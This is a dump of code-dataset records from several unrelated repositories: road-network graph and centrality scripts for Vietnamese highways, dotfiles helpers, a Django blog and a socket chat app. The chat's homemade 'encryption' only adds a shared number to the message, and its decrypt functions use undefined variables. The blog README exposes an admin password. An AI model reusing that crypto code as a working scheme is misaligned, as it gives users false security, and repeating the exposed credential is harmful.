nodeList.remove(firstPoint)\n continue\n ### add edges between nodes ###############################################\n middlePointList = pointList[1:-1]\n if firstNodeID in middlePointList or lastNodeID in middlePointList:\n# G.remove_node(firstNodeID)\n# nodeList.remove(firstPoint)\n# G.remove_node(lastNodeID)\n# nodeList.remove(lastPoint)\n continue\n ### create link ###########################################################\n if feature.GetField('ONEWAY') == '-1':\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n G[lastNodeID][firstNodeID]['length'] = feature_length\n elif feature.GetField('ONEWAY') == 'yes':\n G.add_edge(firstNodeID, lastNodeID)\n for attribute in attributeList:\n G[firstNodeID][lastNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[firstNodeID][lastNodeID]['middle'] = middlePointList\n G[firstNodeID][lastNodeID]['length'] = feature_length\n else:\n G.add_edge(firstNodeID, lastNodeID)\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[firstNodeID][lastNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[firstNodeID][lastNodeID]['middle'] = middlePointList\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n G[firstNodeID][lastNodeID]['length'] = feature_length\n G[lastNodeID][firstNodeID]['length'] = feature_length\n ### intersect processing ##################################################\n for edge in G.edges():\n headID = edge[0]\n tailID = edge[1]\n attributeDict = G[headID][tailID]\n middle = attributeDict['middle']\n if firstPoint in middle:\n if headID == firstNodeID or firstNodeID == tailID:\n continue\n indexFirstPoint = middle.index(firstPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexFirstPoint]\n attributeDictPart2['middle'] = middle[indexFirstPoint+1:]\n # recalucate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexFirstPoint+1])\n roadPart2 = middle[indexFirstPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, firstNodeID, attr_dict=attributeDictPart1)\n G.add_edge(firstNodeID, tailID, attr_dict=attributeDictPart2)\n elif lastPoint in middle:\n if headID == lastNodeID or lastNodeID == tailID:\n continue\n indexLastPoint = middle.index(lastPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexLastPoint]\n attributeDictPart2['middle'] = middle[indexLastPoint+1:]\n # recalculate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexLastPoint+1])\n roadPart2 = middle[indexLastPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, lastNodeID, attr_dict=attributeDictPart1)\n G.add_edge(lastNodeID, tailID, attr_dict=attributeDictPart2)\n\n### remove middle properties ##################################################\nfor edge in G.edges_iter():\n G[edge[0]][edge[1]].pop('middle')\n\n### remove zeros neighbor nodes ###############################################\nfor node in G.nodes():\n if G.in_degree()[node] == 0 and G.out_degree()[node] == 0:\n print(node)\n G.remove_node(node)\n### check if 2 node same lat long #############################################\nlat = G.node[0]['lat']\nlng = G.node[0]['lng']\nsameCount = -1\nfor i in G.nodes_iter():\n if G.node[i]['lat'] == lat and G.node[i]['lng'] == lng:\n sameCount += 1\n else:\n lat = G.node[i]['lat']\n lng = G.node[i]['lng']\nprint('same location Count: ',sameCount)\n\n### check for self loop in result graph #######################################\nself_loop_count = 0\nfor node in G.nodes_iter():\n if node in G.neighbors(node):\n self_loop_count += 1\n print(node, G.neighbors(node))\nprint('self_loop_count: ', self_loop_count)\n\n# nx.write_gexf(G,'./highway_line_singlepart.gexf')\n# nx.write_gexf(G,'./highway_line_singlepart_new_length.gexf')\n# nx.write_gexf(G,'./highway_line_singlepart_new_123.gexf')\nnx.write_gexf(G,'./graphdata/highway_line_singlepart_new_length.gexf')\n# create links between nodes\n# add metadata of links\n# save graph\n# release dataset\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.7142302989959717,
"alphanum_fraction": 0.732842206954956,
"avg_line_length": 36.37681198120117,
"blob_id": "a71f27da61c4990be83f8bbf7721ae66a5f9d128",
"content_id": "5633620211b1c21da140ee53fffc890374b775cf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2604,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 69,
"path": "/vietnam-highway/centrality_analysis.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 06 13:55:25 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('./R_VN_NHW_Inventory_1_connected_component.gexf')\n\n### betweeness centrality \nimport time\nstart_time = time.time()\n# normalized\nbetweeness_norm_dict = nx.algorithms.betweenness_centrality(G,weight='length')\nbetweeness_norm_matrix = np.array(betweeness_norm_dict.values())\nbetweeness_dict = nx.algorithms.betweenness_centrality(G,weight='length',normalized=False)\nbetweeness_matrix = np.array(betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#import h5py\n#h5file = h5py.File('betweeness.h5', 'w')\n#h5file.create_dataset('betweeness_norm', data=betweeness_norm_matrix)\n#h5file.create_dataset('betweeness', data=betweeness_matrix)\n#h5file.close()\n#betweeness_matrix_sorted = np.sort(betweeness_matrix)\n\n### reopen betweeness result \n#import h5py\n#import numpy as np\n#h5f = h5py.File('betweeness.h5','r')\n#betweeness_norm = h5f['betweeness_norm'][:]\n#betweeness = h5f['betweeness'][:]\n#betweeness_norm_cdf = np.cumsum(betweeness_norm)\n#betweeness_cdf = np.cumsum(betweeness)\n\n### edge betweeness centrality\nimport time\nstart_time = time.time()\n# normalized\nedge_betweeness_norm_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length')\nedge_betweeness_norm_matrix = np.array(edge_betweeness_norm_dict.values())\nedge_betweeness_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length',normalized=False)\nedge_betweeness_matrix = np.array(edge_betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nfor key,value in betweeness_dict.iteritems():\n G.node[key]['betweeness'] = float(value)\n\n# nx.write_gexf(G,'./R_VN_NHW_Inventory_1_connected_component_betweeness.gexf')\n# hist = np.histogram(betweeness_matrix, range=(np.amin(betweeness_matrix),np.amax(betweeness_matrix)),bins=len(betweeness_matrix)/10)\nhist = np.histogram(edge_betweeness_matrix, range=(np.amin(edge_betweeness_matrix),np.amax(edge_betweeness_matrix)),bins=len(edge_betweeness_matrix)/10)\nhist = list(hist)\n#hist[0] = hist[0]*100\n#hist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel(u'Chỉ số trung tâm trung gian cho cạnh')\nax.set_ylabel(u'Số cạnh')\n# plt.title('Degree Distribution')\nplt.title(u'Thống kê tần xuất chỉ số trung tâm trung gian cho cạnh')\n"
},
{
"alpha_fraction": 0.7204359769821167,
"alphanum_fraction": 0.7384195923805237,
"avg_line_length": 38.91304397583008,
"blob_id": "06ff73c5c203f79dce1eddbefaa6025b55269c6e",
"content_id": "189eed931ad005596285df4782fa28f2a6922bfa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1835,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 46,
"path": "/preprocess/extract_highway_nodes.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "from osgeo import ogr\n\nhighwayFileName = './highway_line_singlepart.shp'\n\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nspatialRef = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\n\noutputFileName = './extract/highway_line_intersect.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\n\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbPoint)\nfeatureDefn = outLayer.GetLayerDefn()\n\nnodeList = []\nfor i in range(featureCount):\n feature = layer.GetFeature(i)\n geometry = feature.geometry()\n pointCount = geometry.GetPointCount()\n firstPoint = ogr.Geometry(ogr.wkbPoint)\n lastPoint = ogr.Geometry(ogr.wkbPoint)\n lastPoint.AddPoint(geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1])\n firstPoint.AddPoint(geometry.GetPoint(0)[0],geometry.GetPoint(0)[1])\n if (geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]) not in nodeList:\n nodeList.append((geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]))\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(firstPoint)\n outLayer.CreateFeature(outFeature)\n if (geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]) not in nodeList:\n nodeList.append((geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]))\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(lastPoint)\n outLayer.CreateFeature(outFeature)\n# print('firstPoint: ',firstPoint)\n# print('lastPoint:', lastPoint)\n# nodeList.add((geometry.GetPoint(pointCount-1)[0],geometry.GetPoint(pointCount-1)[1]))\n# nodeList.add((geometry.GetPoint(0)[0],geometry.GetPoint(0)[1]))\n\nprint(len(nodeList))\n\noutLayer = None\noutDataSource = None\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.738779604434967,
"alphanum_fraction": 0.7539082169532776,
"avg_line_length": 34.41071319580078,
"blob_id": "e66ecf0e45f58b0e0bd1f2be86c82bf502fa7d7b",
"content_id": "86629a6486a85d4fd55f5bdbb3d6a33578d08275",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 56,
"path": "/preprocess/centralities.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 23 16:31:38 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('/home/giangblackk/Dropbox/DATN/hanoi_road_map_analysis/preprocess/graphdata/highway_line_singlepart_new_length.gexf')\n\n### betweeness centrality \nimport time\nstart_time = time.time()\n# normalized\nbetweeness_norm_dict = nx.algorithms.betweenness_centrality(G,weight='length')\nbetweeness_norm_matrix = np.array(betweeness_norm_dict.values())\nbetweeness_dict = nx.algorithms.betweenness_centrality(G,weight='length',normalized=False)\nbetweeness_matrix = np.array(betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n# np.save('./betweeness_norm_matrix.npy', betweeness_norm_matrix)\n# np.save('./betweeness_matrix.npy', betweeness_matrix)\n\nimport h5py\nh5file = h5py.File('betweeness.h5', 'w')\nh5file.create_dataset('betweeness_norm', data=betweeness_norm_matrix)\nh5file.create_dataset('betweeness', data=betweeness_matrix)\nh5file.close()\n\n### reopen betweeness result \nimport h5py\nimport numpy as np\nh5f = h5py.File('betweeness.h5','r')\nbetweeness_norm = h5f['betweeness_norm'][:]\nbetweeness = h5f['betweeness'][:]\nbetweeness_norm_cdf = np.cumsum(betweeness_norm)\nbetweeness_cdf = np.cumsum(betweeness)\n\n\n### edge betweeness centrality\nimport time\nstart_time = time.time()\n# normalized\nedge_betweeness_norm_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length')\nedge_betweeness_norm_matrix = np.array(edge_betweeness_norm_dict.values())\nedge_betweeness_dict = nx.algorithms.edge_betweenness_centrality(G,weight='length',normalized=False)\nedge_betweeness_matrix = np.array(edge_betweeness_dict.values())\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nedge_betweeness_norm_cdf = np.cumsum(edge_betweeness_norm_matrix)\nedge_betweeness_cdf = np.cumsum(edge_betweeness_matrix)\n\nhist = np.histogram(betweeness, bins=100,normed=True)\n"
},
{
"alpha_fraction": 0.7365010976791382,
"alphanum_fraction": 0.7429805397987366,
"avg_line_length": 50.33333206176758,
"blob_id": "c0f9ad88d46cd077f5c197841e43bdae7f75cc0b",
"content_id": "ac02d9f4141b8feb9a7c6bf0d39cf6e374d16ac5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 463,
"license_type": "permissive",
"max_line_length": 316,
"num_lines": 9,
"path": "/vietnam-highway/.spyproject/workspace.ini",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "[workspace]\nsave_data_on_exit = True\nrestore_data_on_startup = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = '0.1.0'\nrecent_files = [u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\centrality_analysis.py', u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\from_vn_highway_to_graph.py', u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\vietnam-highway\\\\histogram_analysis.py']\n\n"
}
] | 13 |
SF97/dotfiles
|
https://github.com/SF97/dotfiles
|
976e7e0d6f56f9db990f6e802f533636dac36d8c
|
6ea076b549a89ee9699d577b726de9e0e9857b8e
|
1ce662f3e151c0218b55bc5f1aa0ed5f6dae787e
|
refs/heads/master
| 2020-05-17T12:10:52.397853 | 2019-09-29T14:49:55 | 2019-09-29T14:49:55 | 183,704,736 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6927374005317688,
"alphanum_fraction": 0.6983240246772766,
"avg_line_length": 24.571428298950195,
"blob_id": "cf8f81f45050430772bc744dae5df509fb12b6bf",
"content_id": "2921a3cf883cbd8c8b77789442fbd1c17d7bd991",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 14,
"path": "/.config/scripts/enable_apt_sources.py",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nimport aptsources.sourceslist as sl\nimport lsb_release\n\ncodename = lsb_release.get_distro_information()['CODENAME']\nsources = sl.SourcesList()\n\nfor source in sources.list:\n if source.comment.lower().find(\"disabled on upgrade\") >= 0:\n source.dist = codename\n source.set_enabled(True)\n print(source)\nsources.save()\n"
},
{
"alpha_fraction": 0.7592592835426331,
"alphanum_fraction": 0.7685185074806213,
"avg_line_length": 35,
"blob_id": "bd1314a9e9fcc346576a0042bcf940e2adc6801c",
"content_id": "bc1ac68c99dfb5a6c7a4c3188747fab69153bf4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 3,
"path": "/.config/polybar/scripts/spotify/launchlistener.sh",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env sh\n\n/usr/bin/env python3 /home/filipe/.config/polybar/scripts/spotify/py_spotify_listener.py\n"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 13,
"blob_id": "c113748e24a95b24964331d5d518a8d65a6fdcc8",
"content_id": "23add8e894944daffb21c2f30b3a576d0f793506",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/README.md",
"repo_name": "SF97/dotfiles",
"src_encoding": "UTF-8",
"text": "# dotfiles\n\nMy dotfiles. Managed via yadm\n"
}
] | 3 |
pintoderian/blogdjango
|
https://github.com/pintoderian/blogdjango
|
9eb9d530f20b566148a5398d0a1d21caca397e20
|
99441171ee8ff8786fa940205628f9aeaeb74979
|
d900091884ca666f594d178a25673327db0d2d5b
|
refs/heads/master
| 2020-03-14T18:10:10.118001 | 2018-05-04T22:57:20 | 2018-05-04T22:57:20 | 131,736,079 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6915113925933838,
"alphanum_fraction": 0.6915113925933838,
"avg_line_length": 31.266666412353516,
"blob_id": "931258d5340eb25c8f931f92b3da55835af3fbf4",
"content_id": "3e4c4e6fbac3597a2730a0265fa19169fa5d514e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 15,
"path": "/posts/admin.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Post \n#importanción relativa\n\n# Register your models here.\nclass PostModelAdmin(admin.ModelAdmin):\n list_display = ('__str__','actualizado', 'timestamp')\n #list_display_links = [\"actualizado\"] para que el link este en la fecha y no en el titulo\n list_filter = ['timestamp']\n search_fields = ['titulo', 'contenido']\n exclude = ('slug',)\n class Meta:\n model = Post\n\nadmin.site.register(Post, PostModelAdmin)"
},
{
"alpha_fraction": 0.5335752964019775,
"alphanum_fraction": 0.5680580735206604,
"avg_line_length": 22.95652198791504,
"blob_id": "186059f20d680a474246cae3f989e86bf37c2f55",
"content_id": "c7e39313a21fb682311571be6c750d30e1e232ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/posts/migrations/0003_auto_20180501_2130.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.4 on 2018-05-02 02:30\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('posts', '0002_remove_post_slug'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='actualizado',\n field=models.DateTimeField(auto_now=True),\n ),\n migrations.AlterField(\n model_name='post',\n name='timestamp',\n field=models.DateTimeField(auto_now_add=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7147887349128723,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 15.72549057006836,
"blob_id": "1901530832c1abd6c51f7b3957a6d4b2d5a5dd45",
"content_id": "29658db4e96f9ea19479331554903b6459211498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 51,
"path": "/README.md",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "# Blog con Python 3 + Django\n\nAlgunos comandos de utilidad\n-\n\n```\nvirtualenv blog-django o virtualenv .\n```\n\n (dentro de la carpeta del proyecto)\n```\n.\\Scripts\\activate\npip install django\n```\n```\npython .\\Scripts\\django-admin.py startproject blogdjango \n```\n(con esto salen las opciones ejemplo: migraciones startproject y demás)\n```\npython .\\Scripts\\django-admin.py\n```\n```\ncd blogdjango\n```\n\n```\npython manage.py runserver\n``` \nSi se pones 8001 al final nos da otro puerto\n\n```\npython manage.py migrate (Migraciones)\n```\nCrear super usuario (Antes de eso hacer las migraciones)\n```\npython manage.py createsuperuser Ejem admin - arrow1995\n```\n\nCreando app python\n```\npython manage.py startapp posts\n```\nMigraciones a modelos\n```\npython manage.py makemigrations\npython manage.py migrate\n```\nArchivos estaticos\n```\npython manage.py collectstatic\n```"
},
{
"alpha_fraction": 0.6315289735794067,
"alphanum_fraction": 0.6419752836227417,
"avg_line_length": 29.114286422729492,
"blob_id": "d631d0c8385465a68ee73386672de134ffc1b082",
"content_id": "1b2cadbd9c30e931e0acbabd18e4774323986160",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1053,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 35,
"path": "/posts/views.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse #importado\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render, get_object_or_404\nfrom django.db.models import Q\nfrom .models import Post\n# Create your views here.\ndef post_home(request):\n #return HttpResponse(\"<h1>Post home!</h1>\")\n query = Post.objects.all()\n buscar = request.GET.get('q')\n if buscar:\n query = query.filter(\n Q(titulo__icontains=buscar)|\n Q(contenido__icontains=buscar)\n ).distinct()\n \n paginator = Paginator(query, 5)\n\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n context = {\n \"titulo\": \"Blog con Django\",\n \"posts\": posts\n }\n return render(request, \"index.html\", context)\n\ndef post_detail(request, slug=None):\n #return HttpResponse(\"<h1>Post home!</h1>\")\n query = get_object_or_404(Post, slug=slug)\n context = {\n \"titulo\": query.titulo,\n \"post\": query\n }\n return render(request, \"post.html\", context)"
},
{
"alpha_fraction": 0.6837242245674133,
"alphanum_fraction": 0.6865671873092651,
"avg_line_length": 35.0512809753418,
"blob_id": "337a2218231a0b42e101faa9bccc031ba1ed546e",
"content_id": "3d69aaffabf3856c8ca4ca79ece57d985a8dbc95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1407,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 39,
"path": "/posts/models.py",
"repo_name": "pintoderian/blogdjango",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\nclass Post(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)\n titulo = models.CharField(max_length=150)\n imagen = models.FileField(null=True,blank=True)\n slug = models.SlugField(unique=True)\n contenido = models.TextField()\n timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)\n actualizado = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def __str__(self):\n return '%s' % self.titulo\n \n def get_absolute_url(self):\n return reverse(\"detail\", kwargs={\"slug\": self.slug})\n\n class Meta:\n ordering = [\"-timestamp\", \"-actualizado\"]\n#creando slug en el modelo\ndef create_slug(instance, new_slug=None):\n slug = slugify(instance.titulo)\n if new_slug is not None:\n slug = new_slug\n qs = Post.objects.filter(slug=slug).order_by(\"-id\")\n exists = qs.exists()\n if exists:\n new_slug = \"%s-%s\" %(slug, qs.first().id)\n return create_slug(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_post_receiver(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = create_slug(instance)\n\npre_save.connect(pre_save_post_receiver, sender=Post)\n\n"
}
] | 5 |
nickyfoster/pycryptochat
|
https://github.com/nickyfoster/pycryptochat
|
bcc902ebd4c1fa25a1b04c6a58f7508d3c83edc6
|
0d56ed2c64647975516188b44d38ed99310cf723
|
33de6db1fd70f2158040bec39c36bc9a0249ba8d
|
refs/heads/master
| 2020-04-30T23:41:57.491530 | 2019-03-22T14:22:19 | 2019-03-22T14:22:19 | 177,150,510 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5388162732124329,
"alphanum_fraction": 0.5687932372093201,
"avg_line_length": 21.05084800720215,
"blob_id": "643ca35476911d73caf241cdcc2b39615994920e",
"content_id": "f497bca0f6022f79c2947b5e1981ffcf7130503f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1301,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 59,
"path": "/serverRSA.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\nimport random\nimport sys\nfrom time import sleep\n\ndef encrypt(text, key):\n global encrypted\n encrypted = int.from_bytes(text.encode('utf-8'), byteorder='big')\n encrypted = encrypted + key\n return encrypted\n\ndef decrypt(encrypted, key):\n encrypted = encrypted - key\n s = encrypted.to_bytes(encrypted, length=len(strg), byteorder='big').decode('utf-8')\n return text\n\ndef crypt(host,port,c):\n y = 121\n p = 22344323423\n secret = random.randint(1,499)\n alpha = str(int((pow(y,secret) % p)))\n\n c.sendto(alpha.encode(),(host,port))\n\n beta = int(c.recv(1024).decode('UTF-8'))\n\n key = pow(beta,secret) % p\n print(\"KEY: \" +str(key))\n return key\n\n\ndef Main():\n host = 'localhost'\n port = int(sys.argv[1])\n key = 1\n\n s = socket.socket()\n s.bind((host, port))\n\n s.listen(3)\n c, addr = s.accept()\n print(\"Connection from: \" + str(addr))\n\n while True:\n\n data = c.recv(1024).decode('UTF-8')\n data = decrypt(int(data),key)\n\n if data == 'h172hdx120o':\n key = crypt(host,port,c)\n else:\n print(\"Bob: \" + str(data))\n data = input(\"-> \")\n data = encrypt(data,key)\n c.sendto(data.encode(),(host,port))\n c.close\n\nif __name__ == '__main__':\n Main()\n"
},
{
"alpha_fraction": 0.6249130368232727,
"alphanum_fraction": 0.6346555352210999,
"avg_line_length": 21.453125,
"blob_id": "7e0b657534a17a6a0413364ba79fb7f7bd482bdd",
"content_id": "b1091050d78c104cede6da8676e0e4efcc0dd4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1437,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 64,
"path": "/client.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom gui import Ui_Form\nimport socket\nimport select\nimport sys\nimport re\n\"\"\"\ndef run(host, port):\n\tsender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\treceiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\treceiver.connect((host, port))\n\tsender.sendto(b'M1', (host, port))\n\tinput = [mdreceiver]\n\trunning = 1\n\twhile running:\n\t\trfd, wfr, efd = select.select(input, [], [])\n\t\timport msvcrt\n\t\tif msvcrt.kbhit(): ready_to_read.append(sys.stdin)\n\t\t\n\t\tfor s in rfd:\n\t\t\tif s == receiver:\n\t\t\t\tdata, addr = receiver.recvfrom(1024)\n\t\t\t\tprint(data)\n\t\t\telif s == sys.stdin:\n\t\t\t\tsender.sendto(sys.stdin.readline(),(host,port))\n\tsender.close()\n\treceiver.close()\n\nif __name__ == \"__main__\":\n\trun('localhost',5005)\n\n\n\n\n\"\"\"\nclass Main(QWidget):\n def __init__(self):\n super(Main, self).__init__()\n\n # Set up the user interface from Designer\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n # Connect signals\n self.ui.pushButton.clicked.connect(self.send)\n \t\t\n\t\t\n\t\t# Set params\n self.ui.textEdit.setReadOnly(True)\n self.ui.textEdit.setFontPointSize(16)\n \n\n\n\t\t\n def send(self):\n self.ui.textEdit.append(self.ui.lineEdit.text())\n \n\t\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ui = Main()\n ui.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5477239489555359,
"alphanum_fraction": 0.577826738357544,
"avg_line_length": 22.482759475708008,
"blob_id": "61e3c4c35a2fa7d02f1688291644bfa95e45371d",
"content_id": "3fe326ef8b18b2c8ef0328284921c9171e4c00bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1362,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 58,
"path": "/clientRSA.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\nimport random\nimport sys\nfrom time import sleep\n\ndef encrypt(text, key):\n global encrypted\n encrypted = int.from_bytes(text.encode('utf-8'), byteorder='big')\n encrypted = encrypted + key\n return encrypted\n\ndef decrypt(encrypted, key):\n encrypted = encrypted - key\n s = encrypted.to_bytes(encrypted, length=len(strg), byteorder='big').decode('utf-8')\n return text\n\ndef crypt(s,host,port):\n y = 121\n p = 22344323423\n message = 'h172hdx120o'\n s.sendto(message.encode(),(host,port))\n alpha = int(s.recv(1024).decode('UTF-8'))\n\n secret = random.randint(500,1000)\n beta = str(int((pow(y,secret) % p)))\n\n s.sendto(beta.encode(),(host,port))\n\n key = pow(alpha,secret) % p\n print(\"KEY: \" +str(key))\n return key\n\n\ndef Main():\n host = 'localhost'\n port = int(sys.argv[1])\n key = 1\n\n s = socket.socket()\n s.connect((host, port))\n print(\"ASS!\")\n\n message = input(\"-> \")\n while message != 'q':\n if message == 'c':\n key = crypt(s,host,port)\n message = 'Done!'\n message = str(encrypt(message, key))\n s.sendto(message.encode(),(host,port))\n data = s.recv(1024)\n data = 